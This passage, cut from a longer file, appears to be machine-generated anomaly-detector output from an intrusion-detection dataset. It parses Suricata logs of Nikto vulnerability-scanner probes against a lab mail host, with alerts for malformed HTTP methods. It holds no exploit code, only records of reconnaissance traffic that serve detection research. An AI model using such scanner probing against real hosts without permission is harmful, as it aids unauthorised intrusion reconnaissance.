"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nsconfig\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nsconfig\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nsconfig", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nsconfig", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46880, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":127685066625492,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 127685066625492, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.268291+0000\",\"flow_id\":127685066625492,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.270141 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46882 -> 192.168.10.154:80", "/parser/model/time": 1583349514.270141, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46882, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.270141 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46882 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.axd", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.270360+0000\",\"flow_id\":531532251536341,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.27036, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":531532251536341,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.axd\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.axd\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.axd", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.axd", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46882, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":531532251536341,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 531532251536341, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.270360+0000\",\"flow_id\":531532251536341,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.272047 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46884 -> 192.168.10.154:80", "/parser/model/time": 1583349514.272047, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46884, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.272047 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46884 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.show", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.272253+0000\",\"flow_id\":477548807594957,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.272253, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":477548807594957,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.show\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.show\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.show", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.show", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46884, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":477548807594957,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 477548807594957, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.272253+0000\",\"flow_id\":477548807594957,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.274557 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46886 -> 192.168.10.154:80", "/parser/model/time": 1583349514.274557, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46886, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.274557 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46886 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 